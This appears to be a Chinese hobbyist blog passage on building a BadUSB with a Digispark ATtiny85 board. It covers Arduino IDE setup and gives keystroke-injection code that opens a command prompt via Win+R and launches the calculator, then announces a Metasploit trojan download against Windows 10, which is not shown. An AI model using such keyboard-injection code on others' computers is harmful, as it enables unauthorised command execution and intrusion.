这段时间看美剧黑客军团,里面在停车场扔 Badusb 钓鱼的镜头,看的我着实震惊啊,不得不感叹大佬就是大佬。然后就在某宝上买了块板子来学习一下。
这个东西很多大佬都已经玩过的,学习下,记录下学习的过程,大佬勿喷。
0x00 前期准备
arduino 的 IDE 开发环境arduino-1.6.5-r5
Digispark 的驱动Digispark
Digispark kickstarter 开发板Attiny85微型 USB接口
(文末附链接。)
0x01开始踩坑
1.加载 Digispark 的板子,打开 Arduino 选择文件 > 首选项 >
2.在下图位置加上如下 URL ,加载其他的开发板。
http://digistump.com/package_digistump_index.json
3.选择工具 > 板 > Boards Manager
4.等待下图的进度条完成,然后在上方右侧的框中输入Di 看到 Digistump 这个,点击安装,等待安装完成。(很慢......)
5.安装完成以后重新选择工具 > 板,就可以看见刚才安装好的,点击选择。
6.解压 Digispark 文件安装驱动,64位安装 DPinst.exe 32位安装 DPinst.exe。
(无脑安装点击就行了。)
7.准备好了,我们就可以来写代码,烧录第一个 Badusb 了。嗯,没啥好说的。就先给各位大表哥弹个计算机(计算器)吧。
代码写完可以先点击左上角的 √ 检查是否有错误。
确认无误后点击上传,等待下方出现 Plug in device now ... ,然后插入板子
显示如下就代表成功了!
示例代码:
#include "DigiKeyboard.h"
void setup(){
DigiKeyboard.delay(500); //延迟0.5秒
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT); //按下 win+r 键
DigiKeyboard.delay(500);
DigiKeyboard.print("cmd"); //输入cmd
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER); //按下回车键
DigiKeyboard.delay(500);
DigiKeyboard.print("calc");
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
各位大表哥一定觉得弹个计算器有啥好玩的?但是既然都弹计算器了,啥不能干啊。下面给大家表演个好玩的,结合 kali 的 msf 下载远程木马文件,并执行,渗透一波 win10 。
